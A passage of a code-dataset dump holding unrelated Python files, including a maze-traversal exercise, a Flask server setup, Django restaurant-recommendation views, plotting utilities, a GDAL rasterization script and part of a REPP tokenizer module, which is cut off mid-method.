World()\n\n#construct a traversal graph\n#do dft for finding all the possible room player can move\n#do bfs for finding unexplored direction\n\n# You may uncomment the smaller graphs for development and testing purposes.\n#map_file = \"maps/test_line.txt\"\n#map_file = \"maps/test_cross.txt\"\n#map_file = \"maps/test_loop.txt\"\n#map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph=literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\n\nplayer = Player(world.starting_room)\nplayer.current_room = world.starting_room\n\n\n\nopposit_dic = {'n': 's',\n 's': 'n',\n 'e': 'w',\n 'w': 'e'\n }\n\ntraversal_path = []\n\ndef bfs(current_room):\n \"\"\"\n BFS for the unexplored room, then \n Return the path to it\n \"\"\"\n #add the visited room\n visited = set() \n #rooms to check\n q =[]\n q.append((current_room, []))\n count = 0\n #create a visited vertex\n while len(q)>0:\n #dequeue the current room exist\n (room, path) = q.pop(0)\n if room in visited :\n continue\n else:\n visited.add(room)\n for direction in visited_room[room]:\n if visited_room[room][direction] == '?':\n return [path, direction]\n elif visited_room[room][direction] is not None:\n update_path = path.copy()\n update_path.append(direction)\n next_room = visited_room[room][direction]\n q.append((next_room, update_path))\n return None\nimport random\ndef dft(unexplored_dir):\n #create an empty stack and add the starting room exists directions\n stack = Stack()\n stack.push(unexplored_dir)\n\n #while stack is not empty\n while stack.size() >0:\n #pop the current room exits direction\n current_exit = stack.pop()\n move_dir =current_exit[-1]\n # if this direction is not explored\n if move_dir not in visited_room[player.current_room.id]:\n continue\n elif visited_room[player.current_room.id][move_dir] =='?':\n previous_room = player.current_room.id\n #move player in that direction\n player.travel(move_dir)\n # store the movement in the traversal path\n traversal_path.append(move_dir)\n # update the unexplored direction in the dictionary\n visited_room[previous_room][move_dir] = player.current_room.id\n opposite_value = opposit_dic[move_dir]\n if player.current_room.id not in visited_room:\n #if visited_room[player.current_room.id]\n visited_room[player.current_room.id] = {opposite_value:previous_room}\n else:\n visited_room[player.current_room.id][opposite_value]= previous_room\n # get all the neighbour room direction\n for direction in player.current_room.get_exits():\n if direction not in visited_room[player.current_room.id]:\n visited_room[player.current_room.id][direction]='?'\n new_dir = []\n new_dir.append(direction)\n stack.push(new_dir)\n unexplored_dir = bfs(player.current_room.id)\n if unexplored_dir !=None:\n for direction in unexplored_dir[0]:\n player.travel(direction)\n traversal_path.append(direction)\n dft([unexplored_dir[1]])\n\nstarting_dir = random.choice(player.current_room.get_exits())\n\nvisited_room ={player.current_room.id :{}}\nfor direction in player.current_room.get_exits():\n visited_room[player.current_room.id][direction] ='?'\n\ndft([starting_dir])\n\n\n\n# Fill this out with directions to walk\n#traversal_path = ['n', 'n']\n\n\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n# # queue = Queue()\n# #create dic for visited vertex and path\n# visited = {} # Note that this is a dictionary, not a set\n# #enqueue the queue with the starting user_id as a path\n# queue.enqueue([player.current_room])\n# #while queue is not empty\n# while queue.size()>0:\n# #dequeue the current path\n# current_path = queue.dequeue()\n# #get the current vertex from end of the path\n# current_room = current_path[-1]\n# if current_room not in visited:\n# visited[current_room] = current_path\n# #queue up all the neighbours as path\n# for direction in player.current_room.get_exits():\n\n# new_path = current_path.copy()\n# new_path.append(direction)\n# queue.enqueue(new_path)\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n","sub_path":"projects/adventure/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"639865662","text":"import logging\n\nfrom flask import Flask\nfrom flask_jwt_extended import JWTManager\nfrom sqlalchemy import create_engine\n\nfrom server.routing import register_routes\nfrom config import config\n\nlogger = logging.getLogger(__name__)\n\n\nclass App:\n\tdef __init__(self, config):\n\t\tself._config = config\n\t\tself._flask = Flask(__name__)\n\t\tself._init_token_auth()\n\t\tself.db_engine = create_engine(config['database']['objects']['uri'])\n\n\t\tregister_routes(self)\n\n\tdef _init_token_auth(self):\n\t\tself._flask.config['JWT_SECRET_KEY'] = config['secret']\n\t\tself._flask.config['JWT_ACCESS_TOKEN_EXPIRES'] = config['token_expires']\n\t\tself._jwt = JWTManager(self._flask)\n\n\tdef register_route(self, Resource, view, *endpoints):\n\t\tfor endpoint in endpoints:\n\t\t\tself._flask.add_url_rule(endpoint, view, Resource.as_view(view, app=self))\n\n\tdef run(self):\n\t\thost = self._config['host']\n\t\tport = self._config['port']\n\t\tlogger.info('Listening {} on {} port'.format(host, port))\n\t\tself._flask.run(host=host, port=port)\n\n\napp = App(config)\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"253510303","text":"import os\nimport pytest\n\nimport virtool.jobs.create_sample\n\n\n@pytest.fixture\ndef test_create_sample_job(mocker, tmpdir, loop, request, dbi, dbs, test_db_connection_string, test_db_name):\n tmpdir.mkdir(\"samples\")\n tmpdir.mkdir(\"logs\").mkdir(\"jobs\")\n\n settings = {\n \"data_path\": str(tmpdir),\n \"db_name\": test_db_name,\n \"create_sample_proc\": 6\n }\n\n q = mocker.Mock()\n\n job = virtool.jobs.create_sample.Job(\n test_db_connection_string,\n test_db_name,\n settings,\n \"foobar\",\n q\n )\n\n dbs.jobs.insert_one({\n \"_id\": \"foobar\",\n \"task\": \"create_sample\",\n \"args\": {\n \"sample_id\": \"baz\",\n \"files\": [\n {\n \"id\": \"foo.fq.gz\"\n }\n ]\n },\n \"proc\": 2,\n \"mem\": 4\n })\n\n job.init_db()\n\n return job\n\n\ndef test_check_db(mocker, test_create_sample_job):\n expected = {\n \"foo\": \"bar\"\n }\n\n m_get_sample_params = mocker.patch(\"virtool.jobs.utils.get_sample_params\", return_value=expected)\n\n test_create_sample_job.check_db()\n\n m_get_sample_params.assert_called_with(\n test_create_sample_job.db,\n test_create_sample_job.settings,\n {\n \"sample_id\": \"baz\",\n \"files\": [{\n \"id\": \"foo.fq.gz\"\n }]\n }\n )\n\n assert test_create_sample_job.params == expected\n\n\n@pytest.mark.parametrize(\"exists\", [None, \"sample\", \"fastqc\", \"analysis\"])\ndef test_make_sample_dir(exists, tmpdir, test_create_sample_job):\n \"\"\"\n Test that the function makes the specified sample tree even if the sample path and/or the analysis path already\n exist.\n\n \"\"\"\n sample_path = os.path.join(tmpdir, \"foo\")\n\n test_make_sample_dir.params = {\n \"sample_path\": sample_path,\n \"analysis_path\": os.path.join(sample_path, \"analysis\"),\n \"fastqc_path\": os.path.join(sample_path, \"fastqc\")\n }\n\n if exists is not None:\n os.makedirs(test_make_sample_dir.params[f\"{exists}_path\"])\n\n\n\n\n\n\n\n","sub_path":"tests/jobs/test_create_sample.py","file_name":"test_create_sample.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"651239284","text":"from collections import deque\nclass Solution:\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n parent_lookup = {}\n if not root:\n return None\n queue = deque([root])\n while queue:\n node = queue.popleft()\n if node.left:\n parent_lookup[node.left] = node\n queue.append(node.left)\n if node.right:\n parent_lookup[node.right] = node\n queue.append(node.right)\n p_p = set()\n while True:\n p_p.add(p)\n try:\n p = parent_lookup[p]\n except:\n break\n\n while q:\n if q in p_p:\n return q\n q = parent_lookup[q]","sub_path":"mock/lowest_common_ancestor_of_a_bin_tree.py","file_name":"lowest_common_ancestor_of_a_bin_tree.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"521663297","text":"#!python3\nfrom ete3 import Tree\nimport argparse\n\n\ndef is_float(x):\n try:\n float(x.replace('\\'', \"\"))\n return True\n except ValueError:\n return False\n\n\ndef tree_plot(input_tree):\n t = Tree(input_tree, format=1)\n names = set()\n for node in t.traverse():\n if not node.name or is_float(node.name):\n if node.is_root():\n name = \"Root\"\n else:\n leaves = node.get_leaf_names()\n name = \"\".join([i[0:(int(12 / len(leaves)) + 1)] for i in leaves])\n while name in names:\n name += \"Bis\"\n names.add(name)\n node.name = name\n print(node.name)\n t.write(format=1, outfile=input_tree + \".annotated\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-t', '--tree', required=False, type=str,\n default='../DataEmpirical/PrimatesBinaryLHTShort/rootedtree.nwk', dest=\"t\", metavar=\"\",\n help=\"The tree to be re-written\")\n args = parser.parse_args()\n tree_plot(args.t)\n","sub_path":"scripts/name_internal_nodes_tree.py","file_name":"name_internal_nodes_tree.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"442223853","text":"from django.shortcuts import render\nfrom numpy import dot\nimport json\nimport numpy as np\nimport pandas as pd\nfrom numpy.linalg import norm\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom django.http import JsonResponse\nfrom reviews.models import Review\nfrom stores.models import Store\nfrom accounts.models import Follow,User,Wish\nimport random\n\n# from .serializers import RecommendSerializer\n\nfrom .models import reviewcategory\n\n# Create your views here.\n\n# 리뷰 카테고리 테이블 넣기\ndef insert_data(data,user_id):\n if reviewcategory.objects.filter(user_id=user_id).exists() :\n pass\n else :\n reviewcategory.objects.create(\n user_id = user_id ,\n krzzimandtang = data[0],\n krbbq = data[1],\n krgukbap = data[2],\n krstewandcasserole = data[3],\n krporkfeetandBossam = data[4],\n krseafood = data[5],\n krnoodles = data[6],\n krhomecooking = data[7],\n krchicken=data[8],\n krfood=data[9],\n bunsick=data[10],\n jpfriedfood=data[11],\n jpsashimi=data[12],\n jphomecooking=data[13],\n jpseafood=data[14],\n jpnoodles=data[15],\n jpfood=data[16],\n cddrink=data[17],\n cdcafe=data[18],\n cddessert=data[19],\n chnoodles=data[20],\n chfriedfood=data[21],\n chbbq=data[22],\n chfood=data[23],\n wenoodles=data[24],\n wepizza=data[25],\n wesalad=data[26],\n wefood=data[27],\n brbar=data[28],\n brjpanbar=data[29],\n bkbakery=data[30],\n fffood=data[31]\n ).save()\n\n\n\ndef calcos(myinfo,info_list):\n\n index = [0]*34\n A={}\n result = {}\n returnresult = []\n\n\n for i , (key, value) in enumerate(myinfo[0].items()):\n index[i] = value\n\n # 필요없는 데이터 제거\n del index[0]\n del index[0]\n for i in range(len(info_list)):\n B = [0]*34\n for j ,(key,value) in enumerate(info_list[i].items()):\n B[j] = value\n\n # 필요없는 데이터 제거\n del B[0]\n del B[0]\n \n # 빅데이터 분석\n re = dot(index, B) / (norm(index) * norm(B))\n strindex = info_list[i]['user_id']\n result[strindex] = re\n\n # 연관성 0 인 사람을 제외하고 전부다 리스트 삽입\n for key,value in result.items():\n if value != 0:\n A[key] = value\n\n # 연관성 가장 높은순으로 정렬\n dummy = sorted(A.items(),key=lambda x:x[1],reverse=True)\n\n # 분석 결과 값에서 id만 추출하여 리턴\n for i in dummy:\n returnresult.append(i[0])\n return returnresult\n\ndef categorysearch(my_interest):\n dic = []\n if(my_interest.krzzimandtang != 0):\n dic.append(\"한식찜/탕\")\n if(my_interest.krbbq != 0):\n dic.append(\"한식고기집\")\n if(my_interest.krgukbap != 0):\n dic.append(\"한식국밥\")\n if(my_interest.krstewandcasserole != 0):\n dic.append(\"한식전골/찌개\")\n if(my_interest.krporkfeetandBossam != 0):\n dic.append(\"한식족발/보쌈\")\n if(my_interest.krseafood != 0):\n dic.append(\"한식해산물\")\n if(my_interest.krhomecooking != 0):\n dic.append(\"한식가정식\")\n if(my_interest.krnoodles != 0):\n dic.append(\"한식면요리\")\n if(my_interest.krchicken != 0):\n dic.append(\"한식치킨\")\n if(my_interest.krfood != 0):\n dic.append(\"한식한식\")\n if(my_interest.bunsick != 0):\n dic.append(\"분식분식\")\n if(my_interest.jpfriedfood != 0):\n dic.append(\"일식튀김\")\n if(my_interest.jpsashimi != 0):\n dic.append(\"일식회\")\n if(my_interest.jphomecooking != 0):\n dic.append(\"일식가정식\")\n if(my_interest.jpseafood != 0):\n dic.append(\"일식어패류\")\n if(my_interest.jpnoodles != 0):\n dic.append(\"일식면요리\")\n if(my_interest.jpfood != 0):\n dic.append(\"일식일식\")\n if(my_interest.cddrink != 0):\n dic.append(\"카페음료\")\n if(my_interest.cdcafe != 0):\n dic.append(\"카페카페\")\n if(my_interest.cddessert != 0):\n dic.append(\"카페디저트\")\n if(my_interest.chnoodles != 0):\n dic.append(\"중식면요리\")\n if(my_interest.chfriedfood != 0):\n dic.append(\"중식튀김요리\")\n if(my_interest.chbbq != 0):\n dic.append(\"중식구이요리\")\n if(my_interest.chfood != 0):\n dic.append(\"중식중식\")\n if(my_interest.wenoodles != 0):\n dic.append(\"양식면요리\")\n if(my_interest.wepizza != 0):\n dic.append(\"양식피자\")\n if(my_interest.wesalad != 0):\n dic.append(\"양식샐러드\")\n if(my_interest.wefood != 0):\n dic.append(\"양식해외요리\")\n if(my_interest.brbar != 0):\n dic.append(\"술집술집\")\n if(my_interest.brjpanbar != 0):\n dic.append(\"술집일본선술집\")\n if(my_interest.bkbakery != 0):\n dic.append(\"빵집빵집\")\n if(my_interest.fffood != 0):\n dic.append(\"패스트푸드햄버거\")\n return dic\n\ndef region_index(region_name):\n dummy = {'경북' : '경상북도','경남':'경상남도','충북':'충청북도','충남':'충청남도','전북':'전라북도','전남':'전라남도', '경기' :'경기도','강원':'강원도'}\n returnindex = []\n returnindex.append(region_name)\n returnindex.append(dummy[region_name])\n return returnindex\n\n#추천인 연산해서 리턴하기\n@api_view(['GET'])\ndef recommenduser(request,id):\n info_list = list(reviewcategory.objects.exclude(user_id = id).values())\n myinfo = reviewcategory.objects.filter(user_id = id).values()\n result_list = calcos(myinfo,info_list)\n follower_list = Follow.objects.filter(following_id = id).values('follow_id')\n\n recommend_follower =[]\n \n # 추천인에 팔로우 한사람은 안뜨게 제거\n for i in follower_list:\n try:\n result_list.remove(i['follow_id'])\n except ValueError:\n pass\n \n # 정보 넣어서 리턴\n for i in result_list:\n user = User.objects.get(id=i)\n recommend_follower.append({\n \"id\": user.id,\n \"nickname\": user.nickname,\n \"email\": user.email,\n \"address\": user.address,\n \"spoon_cnt\": user.spoon_cnt,\n \"grade\" : user.grade,\n })\n\n return JsonResponse(recommend_follower,safe = False, json_dumps_params={'ensure_ascii': False} ,status=status.HTTP_200_OK)\n\n#가게추천 연산해서 리턴하기\n@api_view(['GET'])\ndef recommendStore(request,id):\n if User.objects.filter(id=id).exists():\n\n region_name = User.objects.filter(id=id).values('address')\n region_name = region_name[0]['address'].split()\n \n follower_id = Follow.objects.filter(following_id=id)\n \n my_interest = reviewcategory.objects.get(user_id = id)\n my_category = categorysearch(my_interest)\n wish_store = Wish.objects.filter(user_id = id)\n\n follower = []\n store = []\n dummy_store = []\n dummy_store2 = []\n review = []\n flag = False\n search_index = []\n\n #팔로우 한 사람들 id 받아오기\n for f in follower_id:\n fw = User.objects.get(id=f.follow_id)\n follower.append(fw.id)\n \n\n if(region_name[0] in (\"서울\",\"부산\",\"대구\",\"인천\",\"광주\",\"울산\",\"대전\",\"제주\",\"세종\")):\n flag = True\n else:\n search_index = region_index(region_name[0])\n\n #팔로우 된 사람들이 쓴 리뷰중 사용자에게 맞는 음식점 목록 불러오기\n #특별시 및 광역시 와 각종 도를 구분하여 검색\n if(flag == True):\n for fwid in follower:\n rv = Review.objects.filter(user_id=fwid).values()\n \n for st in rv:\n string = Store.objects.get(id=st['store_id'])\n for j in my_category:\n if(j == (string.main_category+string.middle_category) and region_name[0] in string.address):\n dummy_store.append(string.id)\n else:\n for fwid in follower:\n rv = Review.objects.filter(user_id=fwid).values()\n for st in rv:\n string = Store.objects.get(id=st['store_id'])\n for j in my_category:\n if(j == (string.main_category+string.middle_category) and region_name[1] in string.address):\n if(search_index[0] in string.address or search_index[1] in string.address):\n dummy_store.append(string.id)\n #중복제거\n for i in dummy_store:\n if i not in dummy_store2:\n dummy_store2.append(i)\n\n # 좋아요된 가게제거\n for i in wish_store:\n try:\n dummy_store2.remove(i.store_id)\n except ValueError:\n pass\n\n # 가게 정보 입력\n for i in dummy_store2:\n string = Store.objects.get(id=i)\n store.append({\n \"id\": string.id,\n \"store_name\": string.store_name,\n \"area\" : string.area,\n \"tel\" : string.tel,\n \"address\" : string.address,\n \"lat\" : string.lat,\n \"lng\" : string.lng,\n \"main_category\" : string.main_category,\n \"middle_category\" : string.middle_category,\n \"review_cnt\" : string.review_cnt,\n \"star\" : string.star,\n \"pet\" : string.pet,\n \"children\" : string.children,\n \"parent\" : string.parent,\n \"friend\" : string.friend\n })\n\n\n return JsonResponse(store,safe = False, json_dumps_params={'ensure_ascii': False} ,status=status.HTTP_200_OK)\n else:\n return Response({'message': '회원정보가 존재하지 않습니다'}, status=status.HTTP_400_BAD_REQUEST)\n\n# 동행자 가게 추천\n@api_view(['POST'])\ndef recommendcompanion(request):\n id = request.data.get('user_id')\n companion = request.data.get('companion')\n if User.objects.filter(id = id).exists():\n \n user = User.objects.get(id = id)\n region_name = user.address\n region_name = region_name.split()\n \n if(region_name[0] in (\"서울\",\"부산\",\"대구\",\"인천\",\"광주\",\"울산\",\"대전\",\"제주\",\"세종\")):\n dataframe = pd.DataFrame(list(Store.objects.filter(address__contains = region_name[0]).values()))\n else:\n search_index = region_index(region_name[0])\n dataframe = pd.DataFrame(list(Store.objects.filter(address__contains = search_index[0]).values() | Store.objects.filter(address__contains = search_index[1]).values()))\n \n pd.set_option('display.max_rows', None)\n \n df_store = dataframe[dataframe['address'].str.contains(region_name[1])]\n \n df_sort = df_store.sort_values(by=companion, ascending=False).head(200)\n \n js = df_sort.to_json(orient = 'records' ,force_ascii = False)\n \n \n return JsonResponse(json.loads(js),safe = False ,status=status.HTTP_200_OK)\n else:\n return Response({'message':'실패'},status=status.HTTP_400_BAD_REQUEST)","sub_path":"server/recommend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"468430863","text":"# graficke znazorneni kovariancni matice\n# model matrix s parametrizaci\n# \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\n\ndef kresli(df, col, y):\n \"\"\"\n df: dataframe with columns col, y, possibly others\n col: name of a column to group by\n y: target variable to to calculate means of in each group of col\n returns: pandas dataframe with count, badrate for each category of col\n it shows a graph, too\n \"\"\"\n grouped = df.groupby(col)\n tabulka = grouped.agg({y: [lambda x: x.shape[0], np.mean] })\n tabulka.columns = ['count', 'badrate']\n tabulka['podil'] = tabulka['count']/df.shape[0]\n tabulka = tabulka.sort_values(by='badrate')\n tabulka.reset_index(inplace=True)\n sns.set_style('whitegrid')\n #sns.distplot(a=df['typ_rodiny'], kde=False, hist=True, norm_hist=True)\n #plt.hist(df['typ_rodiny'], normed=False)\n #plt.plot([1000, 1200, 0.5, 0.2, 0.1])\n plt.ylim(0,1)\n tabulka['podil'].plot(kind='bar')\n tabulka['badrate'].plot(style='ko')\n tabulka['badrate'].plot(style='r-')\n plt.show()\n return tabulka\n\n\ndef plot_corr(df,size=10):\n '''Function plots a graphical correlation matrix for each pair of columns in the dataframe.\n\n Input:\n df: pandas DataFrame\n size: vertical and horizontal size of the plot'''\n\n corr = np.abs(df.corr())\n fig, ax = plt.subplots(figsize=(size, size))\n ax.matshow(corr)\n plt.xticks(range(len(corr.columns)), corr.columns, rotation=90)\n plt.yticks(range(len(corr.columns)), corr.columns)\n plt.matshow(np.arange(0, 1, 0.01).reshape(1, -1))\n plt.show()\n \n \ndef parallel_coordinates(df, class_column, rotation=45):\n \"\"\"\n Parallel coordinates plotting.\n\n Parameters\n ----------\n df: DataFrame\n class_column: str\n Column name containing class names\n rotation: int\n rotate labels on the x axis of the figure\n \n Returns\n -------\n ax: matplotlib axis object\n \"\"\"\n from pandas.tools.plotting import parallel_coordinates as parcoord\n ax = parcoord(df, class_column)\n locs, labels = plt.xticks()\n plt.setp(labels, rotation=rotation)\n plt.show()\n return ax\n\n\n","sub_path":"pokracovani/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136501267","text":"import gdal\r\nimport ogr\r\n\r\nnaip_fn = 'Cropped_Colombia_Area_3.tiff'\r\nnaip_ds = gdal.Open(naip_fn)\r\n\r\ntrain_fn = 'C:/temp/eosImages/train.shp'\r\ntrain_ds = ogr.Open(train_fn)\r\nlyr = train_ds.GetLayer()\r\ndriver = gdal.GetDriverByName('MEM')\r\ntarget_ds = driver.Create('', naip_ds.RasterXSize, naip_ds.RasterYSize, 1, gdal.GDT_UInt16)\r\ntarget_ds.SetGeoTransform(naip_ds.GetGeoTransform())\r\ntarget_ds.SetProjection(naip_ds.GetProjection())\r\noptions = ['ATTRIBUTE=id']\r\ngdal.RasterizeLayer(target_ds, [1], lyr, options=options)\r\ndata = target_ds.GetRasterBand(1).ReadAsArray()\r\nprint('min', data.min(), 'max', data.max(), 'mean', data.mean())\r\n","sub_path":"OSGDAL/rasterize_truth_data.py","file_name":"rasterize_truth_data.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"634863606","text":"# coding: utf-8\n\n\"\"\"\nRegular Expression Preprocessor (REPP)\n\"\"\"\n\nfrom typing import NamedTuple\nfrom sre_parse import parse_template\nfrom pathlib import Path\nfrom array import array\nimport warnings\nimport logging\n\n# use regex library if available; otherwise warn\ntry:\n import regex as re\n re.DEFAULT_VERSION = re.V1\n _regex_available = True\nexcept ImportError:\n import re # type: ignore\n _regex_available = False\n\nfrom delphin.tokens import YYToken, YYTokenLattice\nfrom delphin.lnk import Lnk\nfrom delphin.exceptions import PyDelphinException, PyDelphinWarning\n# Default modules need to import the PyDelphin version\nfrom delphin.__about__ import __version__ # noqa: F401\n\n\nlogger = logging.getLogger(__name__)\n\n\n#: The tokenization pattern used if none is given in a REPP module.\nDEFAULT_TOKENIZER = r'[ \\t]+'\n\n\nclass REPPError(PyDelphinException):\n \"\"\"Raised when there is an error in tokenizing with REPP.\"\"\"\n\n\nclass REPPWarning(PyDelphinWarning):\n \"\"\"Issued when REPP may not behave as expected.\"\"\"\n\n\nif not _regex_available:\n warnings.warn(\n \"The 'regex' library is not installed, so some regular expression \"\n \"features may not work as expected. Install PyDelphin with the \"\n \"[repp] extra to include the 'regex' library.\",\n REPPWarning)\n\n\nclass REPPResult(NamedTuple):\n \"\"\"\n The final result of REPP application.\n\n Attributes:\n string (str): resulting string after all rules have applied\n startmap (:py:class:`array`): integer array of start offsets\n endmap (:py:class:`array`): integer array of end offsets\n \"\"\"\n string: str\n startmap: array\n endmap: array\n\n\nclass _REPPOperation(object):\n \"\"\"\n The supertype of REPP groups and rules.\n\n This class defines the apply(), trace(), and tokenize() methods\n which are available in [_REPPRule], [_REPPGroup],\n [_REPPIterativeGroup], and [REPP] instances.\n \"\"\"\n def _apply(self, s, active):\n raise NotImplementedError()\n\n def apply(self, s, active=None):\n logger.info('apply(%r)', s)\n for step in self._trace(s, active, False):\n pass # we only care about the last step\n return step\n\n def trace(self, s, active=None, verbose=False):\n logger.info('trace(%r)', s)\n yield from self._trace(s, active, verbose)\n\n def _trace(self, s, active, verbose):\n startmap = _zeromap(s)\n endmap = _zeromap(s)\n # initial boundaries\n startmap[0] = 1\n endmap[-1] = -1\n step = None\n for step in self._apply(s, active):\n if step.applied or verbose:\n yield step\n if step.applied:\n startmap = _mergemap(startmap, step.startmap)\n endmap = _mergemap(endmap, step.endmap)\n if step is not None:\n s = step.output\n yield REPPResult(s, startmap, endmap)\n\n def tokenize(self, s, pattern=DEFAULT_TOKENIZER, active=None):\n logger.info('tokenize(%r, %r)', s, pattern)\n res = self.apply(s, active=active)\n return self.tokenize_result(res, pattern=pattern)\n\n def tokenize_result(self, result, pattern=DEFAULT_TOKENIZER):\n logger.info('tokenize_result(%r, %r)', result, pattern)\n tokens = [\n YYToken(id=i, start=i, end=(i + 1),\n lnk=Lnk.charspan(tok[0], tok[1]),\n form=tok[2])\n for i, tok in enumerate(_tokenize(result, pattern))\n ]\n return YYTokenLattice(tokens)\n\n\nclass REPPStep(NamedTuple):\n \"\"\"\n A single rule application in REPP.\n\n Attributes:\n input (str): input string (prior to application)\n output (str): output string (after application)\n operation: operation performed\n applied (bool): `True` if the rule was applied\n startmap (:py:class:`array`): integer array of start offsets\n endmap (:py:class:`array`): integer array of end offsets\n \"\"\"\n input: str\n output: str\n operation: _REPPOperation\n applied: bool\n startmap: array\n endmap: array\n\n\nclass _REPPRule(_REPPOperation):\n \"\"\"\n A REPP rewrite rule.\n\n The apply() method of this class works like re.sub() in Python's\n standard library, but it analyzes the replacement pattern in order\n to ensure that character positions in the resulting string can be\n traced back (as much as possible) to the original string.\n\n Args:\n pattern: the regular expression pattern to match\n replacement: the replacement template\n \"\"\"\n def __init__(self, pattern, replacement):\n self.pattern = pattern\n self.replacement = replacement\n self._re = _compile(pattern)\n\n groups, literals = parse_template(replacement, self._re)\n # if a literal is None then it has a group, so make this\n # easier to iterate over by making pairs of (literal, None) or\n # (None, group)\n group_map = dict(groups)\n self._segments = [(literal, group_map.get(i))\n for i, literal in enumerate(literals)]\n\n # Get \"trackable\" capture groups; i.e., those that are\n # transparent for characterization. For PET behavior, these\n # must appear in strictly increasing order with no gaps\n self._last_trackable = -1 # index of trackable segment, not group id\n last_trackable_group = 0\n for i, group in groups:\n if group == last_trackable_group + 1:\n self._last_trackable = i\n last_trackable_group = group\n else:\n break\n\n def __str__(self):\n return f'!{self.pattern}\\t\\t{self.replacement}'\n\n def _apply(self, s, active):\n logger.debug(' %s', self)\n\n ms = list(self._re.finditer(s))\n\n if ms:\n pos = 0 # current position in the original string\n shift = 0 # current original/target length difference\n parts = []\n smap = array('i', [0])\n emap = array('i', [0])\n\n for m in ms:\n start = m.start()\n if pos < start:\n _copy_part(s[pos:start], shift, parts, smap, emap)\n\n if self._segments:\n for literal, start, end, tracked in self._itersegments(m):\n if tracked:\n _copy_part(literal, shift, parts, smap, emap)\n else:\n width = end - start\n _insert_part(literal, width, shift, parts,\n smap, emap)\n shift += width - len(literal)\n else:\n # the replacement is empty (match is deleted)\n shift += m.end() - start\n\n pos = m.end()\n\n if pos < len(s):\n _copy_part(s[pos:], shift, parts, smap, emap)\n smap.append(shift)\n emap.append(shift - 1)\n o = ''.join(parts)\n applied = True\n\n else:\n o = s\n smap = _zeromap(o)\n emap = _zeromap(o)\n applied = False\n\n yield REPPStep(s, o, self, applied, smap, emap)\n\n def _itermatches(self, ms):\n \"\"\"Yield pairs of the last affected position and a match.\"\"\"\n last_pos = 0\n for m in ms:\n yield (last_pos, m)\n last_pos = m.end()\n\n def _itersegments(self, m):\n \"\"\"Yield tuples of (replacement, start, end, tracked).\"\"\"\n start = m.start()\n\n # first yield segments that might be trackable\n tracked = self._segments[:self._last_trackable + 1]\n if tracked:\n spans = {group: m.span(group)\n for literal, group in tracked\n if literal is None}\n end = m.start(1) # if literal before tracked group\n for literal, group in tracked:\n if literal is None:\n start, end = spans[group]\n yield (m.group(group), start, end, True)\n start = end\n if group + 1 in spans:\n end = spans[group + 1][0]\n else:\n yield (literal, start, end, False)\n\n # then group all remaining segments together\n remaining = self._segments[self._last_trackable + 1:]\n if remaining:\n literal = ''.join(\n m.group(group) if literal is None else literal\n for literal, group in remaining)\n yield (literal, start, m.end(), False)\n\n\nclass _REPPGroup(_REPPOperation):\n def __init__(self, operations=None, name=None):\n if operations is None:\n operations = []\n self.operations = operations\n self.name = name\n\n def __repr__(self):\n name = '(\"{}\") '.format(self.name) if self.name is not None else ''\n return '<{} object {}at {}>'.format(\n type(self).__name__, name, id(self)\n )\n\n def __str__(self):\n return 'Module {}'.format(self.name if self.name is not None else '')\n\n def _apply(self, s, active):\n o = s\n applied = False\n for operation in self.operations:\n for step in operation._apply(o, active):\n yield step\n o = step.output\n applied |= step.applied\n\n yield REPPStep(s, o, self, applied, _zeromap(o), _zeromap(o))\n\n\nclass _REPPGroupCall(_REPPOperation):\n def __init__(self, name, modules):\n self.name = name\n self.modules = modules\n\n def _apply(self, s, active):\n if active is not None and self.name in active:\n logger.info('>%s', self.name)\n yield from self.modules[self.name]._apply(s, active)\n logger.debug('>%s (done)', self.name)\n else:\n logger.debug('>%s (inactive)', self.name)\n\n\nclass _REPPIterativeGroup(_REPPGroup):\n def __str__(self):\n return f'Internal group #{self.name}'\n\n def _apply(self, s, active):\n logger.debug('>%s', self.name)\n o = s\n applied = 